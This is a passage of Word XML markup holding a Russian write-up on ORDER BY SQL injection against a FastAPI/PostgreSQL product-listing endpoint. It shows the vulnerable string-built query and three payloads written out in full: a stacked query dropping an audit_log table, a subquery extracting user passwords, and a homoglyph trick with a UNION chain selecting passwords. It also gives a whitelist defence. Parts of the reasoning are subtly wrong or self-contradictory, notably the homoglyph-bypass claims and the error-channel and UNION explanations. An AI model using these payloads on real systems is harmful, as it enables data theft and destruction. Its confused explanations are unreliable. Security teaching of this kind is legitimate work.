          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или вообще пропустил check для редкого endpoint), Unicode-обход всплывает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Более реалистичный антипаттерн — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">whitelist отсутствует совсем</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@router.get("/products")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_products(sort: str = Query("created_at"), ...):</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 ORDER BY {sort} LIMIT 50")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ↑ ни whitelist, ни quote_ident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — три варианта</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант A — direct injection (когда whitelist отсутствует):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /products?sort=name;%20DROP%20TABLE%20audit_log--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort = "name; DROP TABLE audit_log--"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w: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(в simple-protocol):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, name, price, rating, created_at FROM products</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE deleted_at IS NULL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY name; DROP TABLE audit_log-- asc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT 50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Парсер разбивает на два statement, второй — DROP. В extended-mode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер отвечает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ERROR: cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на этапе Parse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант B — UNION через ORDER BY с конкатенацией (любой драйвер):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /products?sort=name,(SELECT%20password%20FROM%20users%20LIMIT%201)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort = "name,(SELECT password FROM users LIMIT 1)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. 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ORDER BY name,(SELECT password FROM users LIMIT 1) asc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL принимает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с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">списком expression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через запятую. Subquery в ORDER BY-expression выполняется для каждой row. Если приложение возвращает ошибки сортировки — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: ORDER BY position N is not in select list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с N=subquery — error-канал. Если нет — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY name, password_value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> упорядочивает rows одинаково (потому что password один и тот же для всех rows из этого subquery), но позволяет атакующему использовать ту же позицию для stacked UNION.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант C — Unicode homoglyph bypass (обход whitelist case-sensitive):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /products?sort=nаme  (latin n, Cyrillic 'а' U+0430, latin m, e)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"nаme" not in {"name"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → True → проходит первую проверку. Но если разработчик после whitelist делает дополнительный rewrite (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort = sort.lower()</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if sort not in SORTABLE_COLUMNS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sort = sort.lower()       # ← попытка fallback после miss</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if sort not in SORTABLE_COLUMNS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        sort = "created_at"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"nаme".lower() = "nаme"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Cyrillic 'а' остаётся), но если есть нормализация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">unicodedata.normalize("NFKC", sort)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Cyrillic 'а' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">остаётся как Cyrillic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (NFKC не схлопывает разные scripts). Если whitelist-проверка использует case-folding, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">homoglyphs обходят whitelist даже после normalize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Реальная защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if sort.isascii() and sort in SORTABLE_COLUMNS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С реальной payload-цепочкой: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort=articles%20WHERE%20FALSE%20UNION%20SELECT%201,2,password,4,5%20FROM%20users--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через append к valid column name даёт UNION через ORDER BY-context (требует, чтобы select-list count совпадал — 5 колонок).</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Variant A — stacked queries → DROP / EXFIL. Variant B — extraction через ORDER BY-subquery + error-канал. Variant C — обход whitelist для одной из вышеперечисленных payload-цепочек. ORDER BY-injection особенно опасен тем, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">synthetically-valid sort-by-column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> часто остаётся в логах как нормальный запрос с unusual sort, что не флагается мониторингом.</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Два независимых факта:</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Bind-параметр не работает для identifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. PostgreSQL Wire Protocol определяет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как value-placeholder, не как text-substitution. Это design-решение, потому что bind-параметр имеет тип и сериализуется бинарно. Identifier — это часть SQL-AST, парсится на этапе Parse, не Bind. Поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY $1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> синтаксически валиден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интерпретируется как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">integer constant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> сортирует по первой колонке), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">никогда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как «имя колонки». Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не bypass-trick</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протокольное ограничение</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, которое разработчики недооценивают.</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Python `set membership` не Unicode-aware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 == "а"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → False, потому что это разные code points (U+0061 vs U+0430). Whitelist через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — case-sensitive и script-sensitive. Сравнение работает на bytes, а пользовательский ввод может быть в любом Unicode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сочетание этих двух фактов даёт identifier-injection: разработчик </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">обязан</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> делать text-substitution (не bind), и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">обязан</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> валидировать text — а валидация легко имеет holes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
